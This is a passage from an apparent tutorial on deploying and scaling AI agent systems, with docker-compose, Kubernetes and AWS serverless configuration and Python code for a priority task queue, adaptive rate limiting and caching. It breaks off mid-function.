38 context: .
39 dockerfile: Dockerfile
40 volumes:
41 - ./app:/app
42 - ./data:/data
43 environment:
44 - OPENAI_API_KEY=${OPENAI_API_KEY}
45 - PINECONE_API_KEY=${PINECONE_API_KEY}
46 - PINECONE_ENVIRONMENT=${PINECONE_ENVIRONMENT}
47 - DEBUG=False
48 - LOG_LEVEL=INFO
49 - DATABASE_URL=postgresql://postgres:postgres@postgres:5432/agent_db
50 depends_on:
51 - postgres
52 - redis
53 networks:
54 - agent-network
55 restart: unless-stopped
56 command: celery -A app.celery_app worker --loglevel=info
57 healthcheck:
58 test: ["CMD", "celery", "-A", "app.celery_app", "inspect", "ping"]
59 interval: 30s
60 timeout: 10s
61 retries: 3
62 start_period: 40s
63
64 # Celery beat for scheduled tasks
65 scheduler:
66 build:
67 context: .
68 dockerfile: Dockerfile
69 volumes:
70 - ./app:/app
71 - ./data:/data
72 environment:
73 - OPENAI_API_KEY=${OPENAI_API_KEY}
74 - PINECONE_API_KEY=${PINECONE_API_KEY}
75 - PINECONE_ENVIRONMENT=${PINECONE_ENVIRONMENT}
76 - DEBUG=False
77 - LOG_LEVEL=INFO
78 - DATABASE_URL=postgresql://postgres:postgres@postgres:5432/agent_db
79 depends_on:
80 - postgres
81 - redis
82 networks:
83 - agent-network
84 restart: unless-stopped
85 command: celery -A app.celery_app beat --loglevel=info
86
87 # Flower for monitoring Celery
88 flower:
89 build:
90 context: .
91 dockerfile: Dockerfile
92 ports:
93 - "5555:5555"
94 environment:
95 - CELERY_BROKER_URL=redis://redis:6379/0
96 - FLOWER_BASIC_AUTH=${FLOWER_USER}:${FLOWER_PASSWORD}
97 depends_on:
98 - redis
99 - worker
100 networks:
101 - agent-network
102 restart: unless-stopped
103 command: celery -A app.celery_app flower --port=5555
104
105 # PostgreSQL database
106 postgres:
107 image: postgres:14
108 ports:
109 - "5432:5432"
110 environment:
111 - POSTGRES_USER=postgres
112 - POSTGRES_PASSWORD=postgres
113 - POSTGRES_DB=agent_db
114 volumes:
115 - postgres-data:/var/lib/postgresql/data
116 networks:
117 - agent-network
118 restart: unless-stopped
119 healthcheck:
120 test: ["CMD-SHELL", "pg_isready -U postgres"]
121 interval: 10s
122 timeout: 5s
123 retries: 5
124
125 # Redis for Celery broker and caching
126 redis:
127 image: redis:7-alpine
128 ports:
129 - "6379:6379"
130 volumes:
131 - redis-data:/data
132 networks:
133 - agent-network
134 restart: unless-stopped
135 healthcheck:
136 test: ["CMD", "redis-cli", "ping"]
137 interval: 10s
138 timeout: 5s
139 retries: 5
140
141 # Nginx for serving the frontend and API
142 nginx:
143 image: nginx:1.23-alpine
144 ports:
145 - "80:80"
146 - "443:443"
147 volumes:
148 - ./nginx/nginx.conf:/etc/nginx/nginx.conf
149 - ./nginx/conf.d:/etc/nginx/conf.d
150 - ./frontend/build:/usr/share/nginx/html
151 - ./data/certbot/conf:/etc/letsencrypt
152 - ./data/certbot/www:/var/www/certbot
153 depends_on:
154 - agent-api
155 networks:
156 - agent-network
157 restart: unless-stopped
158
159 # Prometheus for metrics
160 prometheus:
161 image: prom/prometheus:v2.40.0
162 ports:
163 - "9090:9090"
164 volumes:
165 - ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml
166 - prometheus-data:/prometheus
167 networks:
168 - agent-network
169 restart: unless-stopped
170
171 # Grafana for visualization
172 grafana:
173 image: grafana/grafana:9.3.0
174 ports:
175 - "3000:3000"
176 environment:
177 - GF_SECURITY_ADMIN_USER=${GRAFANA_USER}
178 - GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_PASSWORD}
179 volumes:
180 - grafana-data:/var/lib/grafana
181 - ./grafana/provisioning:/etc/grafana/provisioning
182 depends_on:
183 - prometheus
184 networks:
185 - agent-network
186 restart: unless-stopped
187
188networks:
189 agent-network:
190 driver: bridge
191
192volumes:
193 postgres-data:
194 redis-data:
195 prometheus-data:
196 grafana-data:

Kubernetes Deployment

For large-scale enterprise deployments, Kubernetes provides advanced orchestration capabilities.

Create a namespace for your agent system:

yaml
1# agent-namespace.yaml
2apiVersion: v1
3kind: Namespace
4metadata:
5 name: ai-agents
6 labels:
7 name: ai-agents

ConfigMap for application settings:

yaml
1# agent-configmap.yaml
2apiVersion: v1
3kind: ConfigMap
4metadata:
5 name: agent-config
6 namespace: ai-agents
7data:
8 LOG_LEVEL: "INFO"
9 DEBUG: "False"
10 CACHE_TTL: "3600"
11 MAX_AGENT_INSTANCES: "10"
12 ALLOWED_ORIGINS: "https://example.com,https://api.example.com"
13 AGENT_TIMEOUT: "300"
14 MONITORING_ENABLED: "True"

Secret for sensitive information:

yaml
1# agent-secrets.yaml
2apiVersion: v1
3kind: Secret
4metadata:
5 name: agent-secrets
6 namespace: ai-agents
7type: Opaque
8data:
9 OPENAI_API_KEY: <base64-encoded-key>
10 PINECONE_API_KEY: <base64-encoded-key>
11 PINECONE_ENVIRONMENT: <base64-encoded-value>
12 POSTGRES_PASSWORD: <base64-encoded-password>
13 REDIS_PASSWORD: <base64-encoded-password>
14 ADMIN_API_KEY: <base64-encoded-key>

API Service deployment:

yaml
1# agent-api-deployment.yaml
2apiVersion: apps/v1
3kind: Deployment
4metadata:
5 name: agent-api
6 namespace: ai-agents
7 labels:
8 app: agent-api
9spec:
10 replicas: 3
11 selector:
12 matchLabels:
13 app: agent-api
14 strategy:
15 type: RollingUpdate
16 rollingUpdate:
17 maxSurge: 1
18 maxUnavailable: 0
19 template:
20 metadata:
21 labels:
22 app: agent-api
23 annotations:
24 prometheus.io/scrape: "true"
25 prometheus.io/port: "8000"
26 prometheus.io/path: "/metrics"
27 spec:
28 containers:
29 - name: agent-api
30 image: your-registry/agent-api:1.0.0
31 imagePullPolicy: Always
32 ports:
33 - containerPort: 8000
34 resources:
35 requests:
36 memory: "1Gi"
37 cpu: "500m"
38 limits:
39 memory: "2Gi"
40 cpu: "1"
41 env:
42 - name: OPENAI_API_KEY
43 valueFrom:
44 secretKeyRef:
45 name: agent-secrets
46 key: OPENAI_API_KEY
47 - name: PINECONE_API_KEY
48 valueFrom:
49 secretKeyRef:
50 name: agent-secrets
51 key: PINECONE_API_KEY
52 - name: PINECONE_ENVIRONMENT
53 valueFrom:
54 secretKeyRef:
55 name: agent-secrets
56 key: PINECONE_ENVIRONMENT
57 - name: DATABASE_URL
58 value: "postgresql://postgres:$(POSTGRES_PASSWORD)@postgres:5432/agent_db"
59 - name: REDIS_URL
60 value: "redis://:$(REDIS_PASSWORD)@redis:6379/0"
61 envFrom:
62 - configMapRef:
63 name: agent-config
64 readinessProbe:
65 httpGet:
66 path: /health
67 port: 8000
68 initialDelaySeconds: 15
69 periodSeconds: 10
70 livenessProbe:
71 httpGet:
72 path: /health
73 port: 8000
74 initialDelaySeconds: 30
75 periodSeconds: 20
76 volumeMounts:
77 - name: agent-data
78 mountPath: /data
79 volumes:
80 - name: agent-data
81 persistentVolumeClaim:
82 claimName: agent-data-pvc

Service to expose the API:

yaml
1# agent-api-service.yaml
2apiVersion: v1
3kind: Service
4metadata:
5 name: agent-api
6 namespace: ai-agents
7 labels:
8 app: agent-api
9spec:
10 selector:
11 app: agent-api
12 ports:
13 - port: 80
14 targetPort: 8000
15 type: ClusterIP

Worker deployment for processing tasks:

yaml
1# agent-worker-deployment.yaml
2apiVersion: apps/v1
3kind: Deployment
4metadata:
5 name: agent-worker
6 namespace: ai-agents
7 labels:
8 app: agent-worker
9spec:
10 replicas: 5
11 selector:
12 matchLabels:
13 app: agent-worker
14 template:
15 metadata:
16 labels:
17 app: agent-worker
18 spec:
19 containers:
20 - name: agent-worker
21 image: your-registry/agent-worker:1.0.0
22 imagePullPolicy: Always
23 resources:
24 requests:
25 memory: "2Gi"
26 cpu: "1"
27 limits:
28 memory: "4Gi"
29 cpu: "2"
30 env:
31 - name: OPENAI_API_KEY
32 valueFrom:
33 secretKeyRef:
34 name: agent-secrets
35 key: OPENAI_API_KEY
36 - name: PINECONE_API_KEY
37 valueFrom:
38 secretKeyRef:
39 name: agent-secrets
40 key: PINECONE_API_KEY
41 - name: PINECONE_ENVIRONMENT
42 valueFrom:
43 secretKeyRef:
44 name: agent-secrets
45 key: PINECONE_ENVIRONMENT
46 - name: DATABASE_URL
47 value: "postgresql://postgres:$(POSTGRES_PASSWORD)@postgres:5432/agent_db"
48 - name: REDIS_URL
49 value: "redis://:$(REDIS_PASSWORD)@redis:6379/0"
50 - name: WORKER_CONCURRENCY
51 value: "4"
52 envFrom:
53 - configMapRef:
54 name: agent-config
55 volumeMounts:
56 - name: agent-data
57 mountPath: /data
58 volumes:
59 - name: agent-data
60 persistentVolumeClaim:
61 claimName: agent-data-pvc

Horizontal Pod Autoscaler for dynamic scaling:

yaml
1# agent-api-hpa.yaml
2apiVersion: autoscaling/v2
3kind: HorizontalPodAutoscaler
4metadata:
5 name: agent-api-hpa
6 namespace: ai-agents
7spec:
8 scaleTargetRef:
9 apiVersion: apps/v1
10 kind: Deployment
11 name: agent-api
12 minReplicas: 3
13 maxReplicas: 10
14 metrics:
15 - type: Resource
16 resource:
17 name: cpu
18 target:
19 type: Utilization
20 averageUtilization: 70
21 - type: Resource
22 resource:
23 name: memory
24 target:
25 type: Utilization
26 averageUtilization: 80
27 behavior:
28 scaleUp:
29 stabilizationWindowSeconds: 60
30 policies:
31 - type: Percent
32 value: 100
33 periodSeconds: 60
34 scaleDown:
35 stabilizationWindowSeconds: 300
36 policies:
37 - type: Percent
38 value: 10
39 periodSeconds: 120

Ingress for external access:

yaml
1# agent-ingress.yaml
2apiVersion: networking.k8s.io/v1
3kind: Ingress
4metadata:
5 name: agent-ingress
6 namespace: ai-agents
7 annotations:
8 kubernetes.io/ingress.class: nginx
9 cert-manager.io/cluster-issuer: letsencrypt-prod
10 nginx.ingress.kubernetes.io/proxy-body-size: "10m"
11 nginx.ingress.kubernetes.io/proxy-read-timeout: "600"
12 nginx.ingress.kubernetes.io/proxy-send-timeout: "600"
13spec:
14 tls:
15 - hosts:
16 - api.example.com
17 secretName: agent-api-tls
18 rules:
19 - host: api.example.com
20 http:
21 paths:
22 - path: /
23 pathType: Prefix
24 backend:
25 service:
26 name: agent-api
27 port:
28 number: 80

Cloud Hosting Options

For serverless deployment on AWS, create a serverless.yml configuration:

yaml
1service: ai-agent-system
2
3frameworkVersion: '3'
4
5provider:
6 name: aws
7 runtime: python3.9
8 stage: ${opt:stage, 'dev'}
9 region: ${opt:region, 'us-west-2'}
10 memorySize: 1024
11 timeout: 30
12 environment:
13 OPENAI_API_KEY: ${ssm:/ai-agent/${self:provider.stage}/OPENAI_API_KEY~true}
14 PINECONE_API_KEY: ${ssm:/ai-agent/${self:provider.stage}/PINECONE_API_KEY~true}
15 PINECONE_ENVIRONMENT: ${ssm:/ai-agent/${self:provider.stage}/PINECONE_ENVIRONMENT}
16 LOG_LEVEL: INFO
17 STAGE: ${self:provider.stage}
18 iam:
19 role:
20 statements:
21 - Effect: Allow
22 Action:
23 - s3:GetObject
24 - s3:PutObject
25 Resource:
26 - "arn:aws:s3:::ai-agent-${self:provider.stage}/*"
27 - Effect: Allow
28 Action:
29 - sqs:SendMessage
30 - sqs:ReceiveMessage
31 - sqs:DeleteMessage
32 - sqs:GetQueueAttributes
33 Resource:
34 - "arn:aws:sqs:${self:provider.region}:*:ai-agent-tasks-${self:provider.stage}"
35 - Effect: Allow
36 Action:
37 - dynamodb:GetItem
38 - dynamodb:PutItem
39 - dynamodb:UpdateItem
40 - dynamodb:DeleteItem
41 - dynamodb:Query
42 - dynamodb:Scan
43 Resource:
44 - "arn:aws:dynamodb:${self:provider.region}:*:table/ai-agent-${self:provider.stage}"
45
46functions:
47 api:
48 handler: app.handlers.api_handler
49 events:
50 - httpApi:
51 path: /api/{proxy+}
52 method: any
53 environment:
54 FUNCTION_TYPE: API
55 memorySize: 1024
56 timeout: 30
57
58 agent-executor:
59 handler: app.handlers.agent_executor
60 events:
61 - sqs:
62 arn:
63 Fn::GetAtt:
64 - AgentTasksQueue
65 - Arn
66 batchSize: 1
67 maximumBatchingWindow: 10
68 environment:
69 FUNCTION_TYPE: WORKER
70 memorySize: 2048
71 timeout: 900 # 15 minutes for long-running tasks
72 reservedConcurrency: 50 # Limit concurrent executions
73
74 scheduler:
75 handler: app.handlers.scheduler_handler
76 events:
77 - schedule: rate(5 minutes)
78 environment:
79 FUNCTION_TYPE: SCHEDULER
80 timeout: 60
81
82resources:
83 Resources:
84 AgentTasksQueue:
85 Type: AWS::SQS::Queue
86 Properties:
87 QueueName: ai-agent-tasks-${self:provider.stage}
88 VisibilityTimeout: 900
89 MessageRetentionPeriod: 86400
90
91 AgentTasksTable:
92 Type: AWS::DynamoDB::Table
93 Properties:
94 TableName: ai-agent-${self:provider.stage}
95 BillingMode: PAY_PER_REQUEST
96 AttributeDefinitions:
97 - AttributeName: id
98 AttributeType: S
99 - AttributeName: user_id
100 AttributeType: S
101 - AttributeName: status
102 AttributeType: S
103 - AttributeName: created_at
104 AttributeType: S
105 KeySchema:
106 - AttributeName: id
107 KeyType: HASH
108 GlobalSecondaryIndexes:
109 - IndexName: UserIndex
110 KeySchema:
111 - AttributeName: user_id
112 KeyType: HASH
113 - AttributeName: created_at
114 KeyType: RANGE
115 Projection:
116 ProjectionType: ALL
117 - IndexName: StatusIndex
118 KeySchema:
119 - AttributeName: status
120 KeyType: HASH
121 - AttributeName: created_at
122 KeyType: RANGE
123 Projection:
124 ProjectionType: ALL
125
126 AgentDataBucket:
127 Type: AWS::S3::Bucket
128 Properties:
129 BucketName: ai-agent-${self:provider.stage}
130 VersioningConfiguration:
131 Status: Enabled
132 LifecycleConfiguration:
133 Rules:
134 - Id: ExpireOldVersions
135 Status: Enabled
136 NoncurrentVersionExpiration:
137 NoncurrentDays: 30

6. Optimizing and Scaling AI Agents for Enterprise Use

Best Practices for Efficient AI Task Orchestration

Efficient orchestration of AI agent tasks is critical for building scalable enterprise systems. Here are key best practices:

1. Implement Task Prioritization and Queuing

python
1# task_orchestration/priority_queue.py
2import heapq
3import time
4import threading
5import uuid
6from typing import Dict, List, Any, Optional, Callable
7from dataclasses import dataclass, field
8
9@dataclass(order=True)
10class PrioritizedTask:
11 """A task with priority for the queue."""
12 priority: int
13 created_at: float = field(default_factory=time.time)
14 task_id: str = field(default_factory=lambda: str(uuid.uuid4()))
15 task_type: str = field(default="", compare=False)
16 payload: Dict[str, Any] = field(default_factory=dict, compare=False)
17 callback: Optional[Callable] = field(default=None, compare=False)
18
19 def __post_init__(self):
20 # Lower number = higher priority
21 # Negate created_at to prioritize older tasks within same priority
22 self.priority = (self.priority, self.created_at)
23
24class PriorityTaskQueue:
25 """Thread-safe priority queue for AI agent tasks."""
26
27 PRIORITY_HIGH = 1
28 PRIORITY_MEDIUM = 2
29 PRIORITY_LOW = 3
30
31 def __init__(self):
32 self._queue = []
33 self._lock = threading.RLock()
34 self._task_map = {} # Maps task_id to position in queue for O(1) lookups
35
36 def push(self, task: PrioritizedTask) -> str:
37 """Add a task to the queue with proper priority."""
38 with self._lock:
39 heapq.heappush(self._queue, task)
40 self._task_map[task.task_id] = task
41 return task.task_id
42
43 def pop(self) -> Optional[PrioritizedTask]:
44 """Get the highest priority task from the queue."""
45 with self._lock:
46 if not self._queue:
47 return None
48 task = heapq.heappop(self._queue)
49 if task.task_id in self._task_map:
50 del self._task_map[task.task_id]
51 return task
52
53 def peek(self) -> Optional[PrioritizedTask]:
54 """View the highest priority task without removing it."""
55 with self._lock:
56 if not self._queue:
57 return None
58 return self._queue[0]
59
60 def remove(self, task_id: str) -> bool:
61 """Remove a specific task by ID."""
62 with self._lock:
63 if task_id not in self._task_map:
64 return False
65
66 # Note: This is inefficient in heapq, but we keep the _task_map for fast lookups
67 # In a production system with frequent removals, consider a different data structure
68 self._queue = [task for task in self._queue if task.task_id != task_id]
69 heapq.heapify(self._queue)
70 del self._task_map[task_id]
71 return True
72
73 def get_task(self, task_id: str) -> Optional[PrioritizedTask]:
74 """Get a task by ID without removing it."""
75 with self._lock:
76 return self._task_map.get(task_id)
77
78 def size(self) -> int:
79 """Get the number of tasks in the queue."""
80 with self._lock:
81 return len(self._queue)
82
83 def update_priority(self, task_id: str, new_priority: int) -> bool:
84 """Update the priority of a task."""
85 with self._lock:
86 if task_id not in self._task_map:
87 return False
88
89 # Remove and re-add with new priority
90 task = self._task_map[task_id]
91 self.remove(task_id)
92 task.priority = new_priority
93 self.push(task)
94 return True
95
96# Example orchestrator that uses the priority queue
97class AgentTaskOrchestrator:
98 """Orchestrates tasks across multiple AI agents with priority queuing."""
99
100 def __init__(self, max_workers=10):
101 self.task_queue = PriorityTaskQueue()
102 self.results = {}
103 self.max_workers = max_workers
104 self.running_tasks = set()
105 self.workers = []
106 self.stop_event = threading.Event()
107
108 def start(self):
109 """Start the orchestrator with worker threads."""
110 self.stop_event.clear()
111
112 # Create worker threads
113 for i in range(self.max_workers):
114 worker = threading.Thread(target=self._worker_loop, args=(i,))
115 worker.daemon = True
116 worker.start()
117 self.workers.append(worker)
118
119 def stop(self):
120 """Stop the orchestrator and all workers."""
121 self.stop_event.set()
122 for worker in self.workers:
123 worker.join(timeout=1.0)
124 self.workers = []
125
126 def schedule_task(self, task_type: str, payload: Dict[str, Any],
127 priority: int = PriorityTaskQueue.PRIORITY_MEDIUM) -> str:
128 """Schedule a task for execution."""
129 task = PrioritizedTask(
130 priority=priority,
131 task_type=task_type,
132 payload=payload
133 )
134 task_id = self.task_queue.push(task)
135 return task_id
136
137 def get_result(self, task_id: str) -> Dict[str, Any]:
138 """Get the result of a task if available."""
139 return self.results.get(task_id, {"status": "unknown"})
140
141 def _worker_loop(self, worker_id: int):
142 """Worker thread that processes tasks from the queue."""
143 while not self.stop_event.is_set():
144 task = self.task_queue.pop()
145
146 if not task:
147 time.sleep(0.1)
148 continue
149
150 try:
151 self.running_tasks.add(task.task_id)
152 self.results[task.task_id] = {"status": "running"}
153
154 # Route task to appropriate handler based on task_type
155 if task.task_type == "agent_execution":
156 result = self._execute_agent_task(task.payload)
157 elif task.task_type == "agent_conversation":
158 result = self._process_conversation(task.payload)
159 elif task.task_type == "data_processing":
160 result = self._process_data(task.payload)
161 else:
162 result = {"error": f"Unknown task type: {task.task_type}"}
163
164 # Store the result
165 self.results[task.task_id] = {
166 "status": "completed",
167 "result": result,
168 "completed_at": time.time()
169 }
170
171 # Execute callback if provided
172 if task.callback:
173 task.callback(task.task_id, result)
174
175 except Exception as e:
176 # Handle task execution errors
177 self.results[task.task_id] = {
178 "status": "failed",
179 "error": str(e),
180 "completed_at": time.time()
181 }
182 finally:
183 self.running_tasks.discard(task.task_id)
184
185 def _execute_agent_task(self, payload: Dict[str, Any]) -> Dict[str, Any]:
186 """Execute an AI agent task."""
187 # Implementation would depend on the specific agent framework
188 agent_type = payload.get("agent_type")
189 parameters = payload.get("parameters", {})
190
191 # This would call your actual agent implementation
192 # For example:
193 # from agent_framework import get_agent
194 # agent = get_agent(agent_type)
195 # return agent.execute(parameters)
196
197 # Placeholder implementation
198 time.sleep(2) # Simulate work
199 return {
200 "agent_type": agent_type,
201 "status": "executed",
202 "payload": parameters
203 }
204
205 def _process_conversation(self, payload: Dict[str, Any]) -> Dict[str, Any]:
206 """Process a conversation message with an AI agent."""
207 # Implementation for conversation processing
208 # Placeholder implementation
209 time.sleep(1) # Simulate work
210 return {
211 "message_processed": True,
212 "response": "This is a simulated agent response"
213 }
214
215 def _process_data(self, payload: Dict[str, Any]) -> Dict[str, Any]:
216 """Process data with an AI agent."""
217 # Implementation for data processing
218 # Placeholder implementation
219 time.sleep(3) # Simulate work
220 return {
221 "data_processed": True,
222 "records_processed": 42
223 }

2. Implement Rate Limiting and Adaptive Concurrency

python
1# task_orchestration/rate_limiter.py
2import time
3import threading
4import logging
5from typing import Dict, List, Any, Optional, Callable
6from dataclasses import dataclass
7
8logger = logging.getLogger(__name__)
9
10@dataclass
11class RateLimitRule:
12 """Rule for rate limiting."""
13 calls_per_minute: int
14 max_burst: int
15 scope: str # 'global', 'model', 'api_key', etc.
16
17class TokenBucket:
18 """Token bucket algorithm implementation for rate limiting."""
19
20 def __init__(self, rate: float, max_tokens: int):
21 """
22 Initialize a token bucket.
23
24 Args:
25 rate: Tokens per second
26 max_tokens: Maximum tokens the bucket can hold
27 """
28 self.rate = rate
29 self.max_tokens = max_tokens
30 self.tokens = max_tokens
31 self.last_refill = time.time()
32 self.lock = threading.RLock()
33
34 def _refill(self):
35 """Refill the bucket based on elapsed time."""
36 now = time.time()
37 elapsed = now - self.last_refill
38 refill = elapsed * self.rate
39
40 with self.lock:
41 self.tokens = min(self.max_tokens, self.tokens + refill)
42 self.last_refill = now
43
44 def consume(self, tokens: int = 1) -> bool:
45 """
46 Consume tokens from the bucket.
47
48 Args:
49 tokens: Number of tokens to consume
50
51 Returns:
52 True if tokens were consumed, False if not enough tokens
53 """
54 self._refill()
55
56 with self.lock:
57 if tokens <= self.tokens:
58 self.tokens -= tokens
59 return True
60 return False
61
62 def wait_for_tokens(self, tokens: int = 1, timeout: Optional[float] = None) -> bool:
63 """
64 Wait until the requested tokens are available.
65
66 Args:
67 tokens: Number of tokens to consume
68 timeout: Maximum time to wait in seconds
69
70 Returns:
71 True if tokens were consumed, False if timeout occurred
72 """
73 if timeout is not None:
74 deadline = time.time() + timeout
75
76 while True:
77 self._refill()
78
79 with self.lock:
80 if tokens <= self.tokens:
81 self.tokens -= tokens
82 return True
83
84 if timeout is not None and time.time() >= deadline:
85 return False
86
87 # Wait for some time before retrying
88 sleep_time = max(0.01, tokens / self.rate)
89 time.sleep(min(sleep_time, 0.1))
90
91class AdaptiveRateLimiter:
92 """
93 Rate limiter with adaptive concurrency based on response times and error rates.
94 Dynamically adjusts concurrency levels for optimal throughput.
95 """
96
97 def __init__(self,
98 initial_rate: float = 10.0,
99 initial_concurrency: int = 5,
100 min_concurrency: int = 1,
101 max_concurrency: int = 50,
102 target_success_rate: float = 0.95,
103 target_latency: float = 1.0):
104 """
105 Initialize the adaptive rate limiter.
106
107 Args:
108 initial_rate: Initial rate limit (requests per second)
109 initial_concurrency: Initial concurrency level
110 min_concurrency: Minimum concurrency level
111 max_concurrency: Maximum concurrency level
112 target_success_rate: Target success rate (0-1)
113 target_latency: Target latency in seconds
114 """
115 self.bucket = TokenBucket(initial_rate, initial_rate * 2) # Allow 2 seconds of burst
116 self.concurrency = initial_concurrency
117 self.min_concurrency = min_concurrency
118 self.max_concurrency = max_concurrency
119 self.target_success_rate = target_success_rate
120 self.target_latency = target_latency
121
122 # Stats tracking
123 self.success_count = 0
124 self.error_count = 0
125 self.latencies = []
126 self.latency_window = 100 # Keep last 100 latencies
127
128 # Semaphore for concurrency control
129 self.semaphore = threading.Semaphore(initial_concurrency)
130
131 # Adaptive adjustment
132 self.adjustment_thread = threading.Thread(target=self._adjustment_loop, daemon=True)
133 self.adjustment_thread.start()
134
135 def execute(self, func: Callable, *args, **kwargs) -> Any:
136 """
137 Execute a function with rate limiting and concurrency control.
138
139 Args:
140 func: Function to execute
141 *args, **kwargs: Arguments to pass to the function
142
143 Returns:
144 Result of the function
145 """
146 # Wait for token from the bucket
147 if not self.bucket.wait_for_tokens(1, timeout=30):
148 raise RuntimeError("Rate limit exceeded - no tokens available")
149
150 # Wait for concurrency slot
151 acquired = self.semaphore.acquire(timeout=30)
152 if not acquired:
153 raise RuntimeError("Concurrency limit exceeded - no slot available")
154
155 start_time = time.time()
156 success = False
157
158 try:
159 result = func(*args, **kwargs)
160 success = True
161 return result
162 finally:
163 execution_time = time.time() - start_time
164 self.semaphore.release()
165
166 # Update stats
167 if success:
168 self.success_count += 1
169 else:
170 self.error_count += 1
171
172 self.latencies.append(execution_time)
173 if len(self.latencies) > self.latency_window:
174 self.latencies.pop(0)
175
176 def get_current_limits(self) -> Dict[str, Any]:
177 """Get current rate limits and stats."""
178 success_rate = self.success_count / max(1, self.success_count + self.error_count)
179 avg_latency = sum(self.latencies) / max(1, len(self.latencies))
180
181 return {
182 "rate_limit": self.bucket.rate,
183 "concurrency": self.concurrency,
184 "success_rate": success_rate,
185 "average_latency": avg_latency,
186 "requests_processed": self.success_count + self.error_count
187 }
188
189 def _adjustment_loop(self):
190 """Background thread that adjusts rate limits based on performance."""
191 while True:
192 time.sleep(10) # Adjust every 10 seconds
193
194 if self.success_count + self.error_count < 10:
195 # Not enough data to make adjustments
196 continue
197
198 # Calculate metrics
199 success_rate = self.success_count / max(1, self.success_count + self.error_count)
200 avg_latency = sum(self.latencies) / max(1, len(self.latencies))
201
202 # Reset counters
203 self.success_count = 0
204 self.error_count = 0
205
206 # Adjust based on success rate and latency
207 if success_rate < self.target_success_rate:
208 # Too many errors, reduce concurrency and rate
209 new_concurrency = max(self.min_concurrency, int(self.concurrency * 0.8))
210 new_rate = max(1.0, self.bucket.rate * 0.8)
211
212 logger.info(f"Reducing limits due to errors: concurrency {self.concurrency} -> {new_concurrency}, "
213 f"rate {self.bucket.rate:.1f} -> {new_rate:.1f} (success rate: {success_rate:.2f})")
214
215 self._update_limits(new_concurrency, new_rate)
216
217 elif avg_latency > self.target_latency * 1.5:
218 # Latency too high, reduce concurrency slightly
219 new_concurrency = max(self.min_concurrency, int(self.concurrency * 0.9))
220
221 logger.info(f"Reducing concurrency due to high latency: {self.concurrency} -> {new_concurrency} "
222 f"(latency: {avg_latency:.2f}s)")
223
224 self._update_limits(new_concurrency, self.bucket.rate)
225
226 elif success_rate > 0.98 and avg_latency < self.target_latency * 0.8:
227 # Everything looks good, try increasing concurrency and rate
228 new_concurrency = min(self.max_concurrency, int(self.concurrency * 1.1) + 1)
229 new_rate = min(100.0, self.bucket.rate * 1.1)
230
231 logger.info(f"Increasing limits: concurrency {self.concurrency} -> {new_concurrency}, "
232 f"rate {self.bucket.rate:.1f} -> {new_rate:.1f} (success rate: {success_rate:.2f}, "
233 f"latency: {avg_latency:.2f}s)")
234
235 self._update_limits(new_concurrency, new_rate)
236
237 def _update_limits(self, new_concurrency: int, new_rate: float):
238 """Update concurrency and rate limits."""
239 # Update concurrency
240 if new_concurrency > self.concurrency:
241 # Add permits to the semaphore
242 for _ in range(new_concurrency - self.concurrency):
243 self.semaphore.release()
244 elif new_concurrency < self.concurrency:
245 # Cannot directly reduce semaphore count
246 # Create a new semaphore and use it going forward
247 self.semaphore = threading.Semaphore(new_concurrency)
248
249 self.concurrency = new_concurrency
250
251 # Update rate limit
252 self.bucket = TokenBucket(new_rate, new_rate * 2) # Allow 2 seconds of burst
253
254class ModelBasedRateLimiter:
255 """Rate limiter that tracks limits separately for different LLM models."""
256
257 def __init__(self):
258 """Initialize with default rate limits for different models."""
259 self.limiters = {
260 # Format: model_name: (rate_per_minute, max_concurrency)
261 "gpt-4-turbo": AdaptiveRateLimiter(initial_rate=6.0, initial_concurrency=3), # 6 RPM
262 "gpt-3.5-turbo": AdaptiveRateLimiter(initial_rate=50.0, initial_concurrency=10), # 50 RPM
263 "text-embedding-ada-002": AdaptiveRateLimiter(initial_rate=100.0, initial_concurrency=20), # 100 RPM
264 "default": AdaptiveRateLimiter(initial_rate=10.0, initial_concurrency=5) # Default fallback
265 }
266
267 def execute(self, model: str, func: Callable, *args, **kwargs) -> Any:
268 """
269 Execute a function with rate limiting based on model.
270
271 Args:
272 model: Model name
273 func: Function to execute
274 *args, **kwargs: Arguments to pass to the function
275
276 Returns:
277 Result of the function
278 """
279 limiter = self.limiters.get(model, self.limiters["default"])
280 return limiter.execute(func, *args, **kwargs)
281
282 def get_limits(self, model: Optional[str] = None) -> Dict[str, Any]:
283 """
284 Get current rate limits for a model or all models.
285
286 Args:
287 model: Optional model name
288
289 Returns:
290 Dictionary with rate limit information
291 """
292 if model:
293 limiter = self.limiters.get(model, self.limiters["default"])
294 return {model: limiter.get_current_limits()}
295
296 return {model: limiter.get_current_limits() for model, limiter in self.limiters.items()}

3. Implement Smart Caching and Result Reuse

python
1# task_orchestration/smart_cache.py
2import hashlib
3import json
4import time
5import threading
6import logging
7from typing import Dict, Any, Optional, Callable, Tuple, List, Union
8from dataclasses import dataclass
9
10logger = logging.getLogger(__name__)
11
12@dataclass
13class CacheEntry:
14 """An entry in the cache."""
15 value: Any
16 created_at: float
17 expires_at: Optional[float]
18 cost: float = 0.0 # For cost-based accounting (e.g., token count, API cost)
19
20class SmartCache:
21 """
22 Smart caching system with TTL, cost-awareness, and partial matching capabilities.
23 """
24
25 def __init__(self,
26 max_size: int = 1000,
27 default_ttl: int = 3600,
28 semantic_cache_threshold: float = 0.92):
29 """
30 Initialize the smart cache.
31
32 Args:
33 max_size: Maximum number of items in the cache
34 default_ttl: Default time-to-live in seconds
35 semantic_cache_threshold: Threshold for semantic similarity matching
36 """
37 self.cache = {}
38 self.max_size = max_size
39 self.default_ttl = default_ttl
40 self.semantic_cache_threshold = semantic_cache_threshold
41 self.lock = threading.RLock()
42 self.metrics = {
43 "hits": 0,
44 "misses": 0,
45 "semantic_hits": 0,
46 "evictions": 0,
47 "total_cost_saved": 0.0
48 }
49
50 # Start cleanup thread
51 self.cleanup_thread = threading.Thread(target=self._cleanup_loop, daemon=True)
52 self.cleanup_thread.start()
53
54 def _hash_key(self, key: Any) -> str:
55 """
56 Create a hash from any key object.
57
58 Args:
59 key: The key to hash (will be converted to JSON)
60
61 Returns:
62 Hashed key string
63 """
64 if isinstance(key, str):
65 key_str = key
66 else:
67 # Convert objects to JSON for hashing
68 key_str = json.dumps(key, sort_keys=True)
69
70 return hashlib.md5(key_str.encode('utf-8')).hexdigest()
71
72 def get(self, key: Any) -> Tuple[bool, Any]:
73 """
74 Get an item from the cache.
75
76 Args:
77 key: Cache key
78
79 Returns:
80 Tuple of (found, value)
81 """
82 hashed_key = self._hash_key(key)
83
84 with self.lock:
